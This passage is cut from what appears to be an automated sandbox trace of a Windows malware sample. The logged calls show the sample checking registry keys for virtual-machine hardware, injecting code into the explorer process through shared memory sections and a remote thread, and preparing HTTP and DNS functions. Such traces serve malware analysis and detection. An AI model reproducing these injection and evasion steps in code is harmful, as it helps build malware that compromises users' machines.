SecurityQualityOfService=0x0) | out: KeyHandle=0x18ed54*=0x13c) returned 0x0 [0223.631] NtQueryKey (in: KeyHandle=0x13c, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x18ed5c | out: KeyInformation=0x0, ResultLength=0x18ed5c) returned 0xc0000023 [0223.631] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x1d4d718 [0223.631] NtQueryKey (in: KeyHandle=0x13c, KeyInformationClass=0x2, KeyInformation=0x1d4d718, Length=0x2c, ResultLength=0x18ed5c | out: KeyInformation=0x1d4d718, ResultLength=0x18ed5c) returned 0x0 [0223.631] NtEnumerateKey (in: KeyHandle=0x13c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ed5c | out: KeyInformation=0x0, ResultLength=0x18ed5c) returned 0xc0000023 [0223.632] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x1d562b8 [0223.632] NtEnumerateKey (in: KeyHandle=0x13c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x1d562b8, Length=0x7c, ResultLength=0x18ed5c | out: KeyInformation=0x1d562b8, ResultLength=0x18ed5c) returned 0x0 [0223.632] LocalFree (hMem=0x1d562b8) returned 0x0 [0223.632] NtEnumerateKey (in: KeyHandle=0x13c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ed5c | out: KeyInformation=0x0, ResultLength=0x18ed5c) returned 0xc0000023 [0223.632] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x1d562b8 [0223.632] NtEnumerateKey (in: KeyHandle=0x13c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x1d562b8, Length=0x7c, ResultLength=0x18ed5c | out: KeyInformation=0x1d562b8, ResultLength=0x18ed5c) returned 0x0 [0223.632] LocalFree (hMem=0x1d562b8) returned 0x0 [0223.632] NtEnumerateKey (in: KeyHandle=0x13c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ed5c | out: KeyInformation=0x0, ResultLength=0x18ed5c) returned 0xc0000023 [0223.632] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x1d562b8 [0223.632] NtEnumerateKey (in: KeyHandle=0x13c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x1d562b8, Length=0x7c, ResultLength=0x18ed5c | out: KeyInformation=0x1d562b8, ResultLength=0x18ed5c) returned 0x0 [0223.633] LocalFree (hMem=0x1d562b8) returned 0x0 [0223.633] NtEnumerateKey (in: KeyHandle=0x13c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ed5c | out: KeyInformation=0x0, ResultLength=0x18ed5c) returned 0xc0000023 [0223.633] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x1d562b8 [0223.633] NtEnumerateKey (in: KeyHandle=0x13c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x1d562b8, Length=0x7c, ResultLength=0x18ed5c | out: KeyInformation=0x1d562b8, ResultLength=0x18ed5c) returned 0x0 [0223.633] LocalFree (hMem=0x1d562b8) returned 0x0 [0223.633] NtEnumerateKey (in: KeyHandle=0x13c, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ed5c | out: KeyInformation=0x0, ResultLength=0x18ed5c) returned 0xc0000023 [0223.633] LocalAlloc (uFlags=0x40, uBytes=0x7a) returned 0x1d562b8 [0223.633] NtEnumerateKey (in: KeyHandle=0x13c, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x1d562b8, Length=0x7a, ResultLength=0x18ed5c | out: KeyInformation=0x1d562b8, ResultLength=0x18ed5c) returned 0x0 [0223.633] LocalFree (hMem=0x1d562b8) returned 0x0 [0223.633] LocalFree (hMem=0x1d4d718) returned 0x0 [0223.633] NtClose (Handle=0x13c) returned 0x0 [0223.633] LocalFree (hMem=0x1d51678) returned 0x0 [0223.633] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x1d51678 [0223.633] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" [0223.633] RtlInitUnicodeString (in: DestinationString=0x18ed34, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") [0223.633] NtOpenKey (in: KeyHandle=0x18ed54, DesiredAccess=0x9, ObjectAttributes=0x18ed3c*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x18ed54*=0x13c) returned 0x0 [0223.633] NtQueryKey (in: KeyHandle=0x13c, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x18ed5c | out: KeyInformation=0x0, ResultLength=0x18ed5c) returned 0xc0000023 [0223.633] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x1d4d718 [0223.633] NtQueryKey (in: KeyHandle=0x13c, KeyInformationClass=0x2, KeyInformation=0x1d4d718, Length=0x2c, ResultLength=0x18ed5c | out: KeyInformation=0x1d4d718, ResultLength=0x18ed5c) returned 0x0 [0223.633] NtEnumerateKey (in: KeyHandle=0x13c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ed5c | out: KeyInformation=0x0, ResultLength=0x18ed5c) returned 0xc0000023 [0223.633] LocalAlloc (uFlags=0x40, uBytes=0x50) returned 0x1d562b8 [0223.633] NtEnumerateKey (in: KeyHandle=0x13c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x1d562b8, Length=0x50, ResultLength=0x18ed5c | out: KeyInformation=0x1d562b8, ResultLength=0x18ed5c) returned 0x0 [0223.633] LocalFree (hMem=0x1d562b8) returned 0x0 [0223.633] LocalFree (hMem=0x1d4d718) returned 0x0 [0223.633] NtClose (Handle=0x13c) returned 0x0 [0223.633] LocalFree (hMem=0x1d51678) returned 0x0 [0223.634] Sleep (dwMilliseconds=0x1388) [0228.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18ed30*=0x0, ZeroBits=0x0, RegionSize=0x18ed34*=0x2d870, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x18ed30*=0x1c60000, RegionSize=0x18ed34*=0x2e000) returned 0x0 [0228.628] GetShellWindow () returned 0x600a0 [0228.628] GetWindowThreadProcessId (in: hWnd=0x600a0, lpdwProcessId=0x18ecdc | out: lpdwProcessId=0x18ecdc) returned 0xbe0 [0228.628] NtOpenProcess (in: ProcessHandle=0x18ed2c, DesiredAccess=0x40, ObjectAttributes=0x18ed14*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x18ed0c*(UniqueProcess=0xbdc, UniqueThread=0x0) | out: ProcessHandle=0x18ed2c*=0x13c) returned 0x0 [0228.628] NtDuplicateObject (in: SourceProcessHandle=0x13c, SourceHandle=0xffffffff, TargetProcessHandle=0xffffffff, TargetHandle=0x18ed30, DesiredAccess=0x0, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x18ed30*=0x138) returned 0x0 [0228.628] NtCreateSection (in: SectionHandle=0x18ece8, DesiredAccess=0x6, ObjectAttributes=0x0, MaximumSize=0x18ecec, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18ece8*=0x140) returned 0x0 [0228.628] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0x18ecf8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18ed04*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18ecf8*=0x390000, SectionOffset=0x0, ViewSize=0x18ed04*=0x5000) returned 0x0 [0228.629] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0x138, BaseAddress=0x18ed00*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18ed04*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18ed00*=0x2b80000, SectionOffset=0x0, ViewSize=0x18ed04*=0x5000) returned 0x0 [0228.629] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x390000, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gtjtdfe")) returned 0x35 [0228.629] NtCreateSection (in: SectionHandle=0x18ece4, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x18ecec, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18ece4*=0x144) returned 0x0 [0228.629] NtMapViewOfSection (in: SectionHandle=0x144, ProcessHandle=0xffffffff, BaseAddress=0x18ecf4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18ed04*=0x15600, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18ecf4*=0x1c90000, SectionOffset=0x0, ViewSize=0x18ed04*=0x16000) returned 0x0 [0228.629] NtMapViewOfSection (in: SectionHandle=0x144, ProcessHandle=0x138, BaseAddress=0x18ecfc*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18ed04*=0x16000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x20 | out: BaseAddress=0x18ecfc*=0x2b90000, SectionOffset=0x0, ViewSize=0x18ed04*=0x16000) returned 0x0 [0228.631] RtlCreateUserThread (in: ProcessHandle=0x138, SecurityDescriptor=0x0, CreateSuspended=0, StackZeroBits=0x0, StackReserve=0x0, StackCommit=0x0, StartAddress=0x2b91a48, Parameter=0x2b80000, ThreadHandle=0x18ec40*=0x7738542d77166c9a, ClientId=0x0 | out: ThreadHandle=0x18ec40*=0x148, ClientId=0x0) returned 0x0 [0228.631] NtTerminateProcess (ProcessHandle=0xffffffff, ExitStatus=0x0) Thread: id = 298 os_tid = 0x4a0 Thread: id = 299 os_tid = 0x4e8 [0177.768] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0177.768] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0177.768] GetProcAddress (hModule=0x76c20000, lpProcName="ReadProcessMemory") returned 0x76c4cfcc [0177.768] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32Next") returned 0x76cb5c3f [0177.768] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0177.768] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0177.768] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0177.769] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0177.769] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0177.769] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0177.769] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0177.769] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0177.769] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0177.769] GetProcAddress (hModule=0x76c20000, lpProcName="OpenThread") returned 0x76c41248 [0177.769] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0177.769] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0177.769] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0177.769] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0177.770] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0177.770] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0177.770] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0177.770] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0177.770] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0177.770] GetProcAddress (hModule=0x76c20000, lpProcName="WriteProcessMemory") returned 0x76c4d9e0 [0177.770] GetProcAddress (hModule=0x76c20000, lpProcName="SuspendThread") returned 0x76c57d7e [0177.770] GetProcAddress (hModule=0x76c20000, lpProcName="ResumeThread") returned 0x76c343ef [0177.770] GetProcAddress (hModule=0x76c20000, lpProcName="RtlZeroMemory") returned 0x77193c10 [0177.771] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32First") returned 0x76cb5b93 [0177.771] GetProcAddress (hModule=0x76c20000, lpProcName="CreateRemoteThread") returned 0x76cb416b [0177.771] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0177.771] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0177.771] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0177.771] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0177.771] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0177.771] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0177.771] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0177.771] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0177.771] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0177.772] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0177.772] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0177.772] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0177.772] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0177.772] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0177.772] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0177.772] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0177.772] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0177.772] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0177.772] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0177.773] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0177.773] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0177.775] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0177.775] GetProcAddress (hModule=0x74850000, lpProcName="DnsQuery_W") returned 0x7486572c [0177.775] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0177.775] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0177.776] GetProcAddress (hModule=0x77130000, lpProcName="NtSetInformationProcess") returned 0x7714fb18 [0177.776] GetProcAddress (hModule=0x77130000, lpProcName="NtMapViewOfSection") returned 0x7714fc40 [0177.776] GetProcAddress (hModule=0x77130000, lpProcName="LdrProcessRelocationBlock") returned 0x771de9cf [0177.776] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0177.776] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0177.776] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0177.776] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0177.776] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0177.779] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReadData") returned 0x747fcb9e [0177.779] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpAddRequestHeaders") returned 0x74809dfb [0177.779] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCrackUrl") returned 0x7480953a [0177.779] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetProxyForUrl") returned 0x747fd5dc [0177.779] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpenRequest") returned 0x747f4aea [0177.780] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0177.780] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCloseHandle") returned 0x747f2c01 [0177.780] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSendRequest") returned 0x747f79bd [0177.780] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7480257e [0177.780] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSetOption") returned 0x747f3f6c [0177.780] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReceiveResponse") returned 0x747fb262 [0177.780] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpConnect") returned 0x747fd9f5 [0177.780] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0177.780] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0177.780] GetProcAddress (hModule=0x75bc0000, lpProcName=0x5) returned 0x75bc7147 [0177.781] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0177.781] VirtualProtect (in: lpAddress=0x250000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x406ff58 | out: lpflOldProtect=0x406ff58*=0x40) returned 1 [0177.781] VirtualProtect (in: lpAddress=0x250000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x406ff58 | out: lpflOldProtect=0x406ff58*=0x4) returned 1 [0177.782] VirtualQuery (in: lpAddress=0x270016, lpBuffer=0x406ff50, dwLength=0x1c | out: lpBuffer=0x406ff50*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x40, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x40000)) returned 0x1c [0177.782] GetProcessHeap () returned 0x1d30000 [0177.782] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x364) returned 0x1d55bc8 [0177.782] RtlMoveMemory (in: Destination=0x1d55bc8, Source=0x270016, Length=0x363 | out: Destination=0x1d55bc8) [0177.782] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x270016) returned 0x0 [0177.783] GetCurrentProcessId () returned 0x5b8 [0177.783] GetProcessHeap () returned 0x1d30000 [0177.783] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x105) returned 0x1d51678 [0177.783] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1d51678, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gtjtdfe")) returned 0x35 [0177.783] GetProcessHeap () returned 0x1d30000 [0177.783] RtlAllocateHeap (HeapHandle=0x1d30000, Flags=0x8, Size=0x105) returned 0x1d55f38 [0177.783] GetCurrentProcessId () returned 0x5b8 [0177.783] wsprintfA (in: param_1=0x1d55f38, param_2="%s%d%d%d" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe37084212414643") returned 67 [0177.783] CryptAcquireContextA (in: phProv=0x406ff54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x406ff54*=0x1d56048) returned 1 [0177.797] CryptCreateHash (in: hProv=0x1d56048, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x406ff58 | out: phHash=0x406ff58) returned 1 [0177.797] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe37084212414643") returned 67 [0177.797] CryptHashData (hHash=0x1d569a8, pbData=0x1d55f38, dwDataLen=0x43, dwFlags=0x0) returned 1 [0177.797] CryptGetHashParam (in: hHash=0x1d569a8, dwParam=0x2, pbData=0x406ff44, pdwDataLen=0x406ff5c, dwFlags=0x0 | out: pbData=0x406ff44, pdwDataLen=0x406ff5c) returned 1 [0177.797] wsprintfA (in: param_1=0x1d55f38, param_2="%02X" | out: param_1="6F") returned 2 [0177.797] wsprintfA (in: param_1=0x1d55f3a, param_2="%02X" | out: param_1="35") returned 2 [0177.797] wsprintfA (in: param_1=0x1d55f3c, param_2="%02X" | out: param_1="49") returned 2 [0177.797] wsprintfA (in: param_1=0x1d55f3e, param_2="%02X" | out: param_1="CF") returned 2 [0177.797] wsprintfA (in: param_1=0x1d55f40, param_2="%02X" | out: param_1="B6") returned 2 [0177.797] wsprintfA (in: param_1=0x1d55f42, param_2="%02X" | out: param_1="F7") returned 2 [0177.797] wsprintfA (in: param_1=0x1d55f44, param_2="%02X" | out: param_1="4F") returned 2 [0177.797] wsprintfA (in: param_1=0x1d55f46, param_2="%02X" | out: param_1="B6") returned 2 [0177.798] wsprintfA (in: param_1=0x1d55f48, param_2="%02X" | out: param_1="2D") returned 2 [0177.798] wsprintfA (in: param_1=0x1d55f4a, param_2="%02X" | out: param_1="80") returned 2 [0177.798] wsprintfA (in: param_1=0x1d55f4c, param_2="%02X" | out: param_1="8A") returned 2 [0177.798] wsprintfA (in: param_1=0x1d55f4e, param_2="%02X" | out: param_1="AF") returned 2 [0177.798] wsprintfA (in: param_1=0x1d55f50, param_2="%02X" | out: param_1="2E") returned 2 [0177.798] wsprintfA (in: param_1=0x1d55f52, param_2="%02X" | out: param_1="9E") returned 2 [0177.798] wsprintfA (in: param_1=0x1d55f54, param_2="%02X" | out: param_1="8C") returned 2 [0177.798] wsprintfA (in: param_1=0x1d55f56, param_2="%02X" | out: param_1="C5") returned 2 [0177.798] CryptDestroyHash (hHash=0x1d569a8) returned 1 [0177.798] CryptReleaseContext (hProv=0x1d56048, dwFlags=0x0) returned 1 [0177.798] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="6F3549CFB6F74FB62D808AAF2E9E8CC5") returned 0x118 [0177.798] GetLastError () returned 0x0 [0177.798] Sleep (dwMilliseconds=0x1f4) [0178.326] GetCurrentProcessId () returned 0x5b8 [0178.326] GetCurrentThreadId () returned 0x4e8 [0178.326] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x11c [0178.327] Thread32First (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.328] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.328] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.328] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.328] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.329] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.329] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.329] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.330] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.330] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.330] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.330] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.331] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.331] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.331] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.331] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.332] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.332] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.332] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.333] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.333] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.333] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.333] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.334] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.334] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.334] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.335] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.335] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.335] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.335] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.336] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.336] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.336] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.336] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.337] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.337] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.337] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.337] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.338] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.338] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.338] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.339] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.339] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.339] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.339] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.340] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.340] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.340] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.340] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.341] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.341] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.341] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.341] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.342] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.342] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.342] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.343] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.343] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.343] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.343] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.344] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.344] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.344] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.344] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.345] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.345] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.345] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.345] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.346] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.346] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.346] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.347] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.347] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.347] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.347] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.348] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.348] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.348] Thread32Next (hSnapshot=0x11c, lpte=0x406ff48) returned 1 [0178.349] Thread32Next 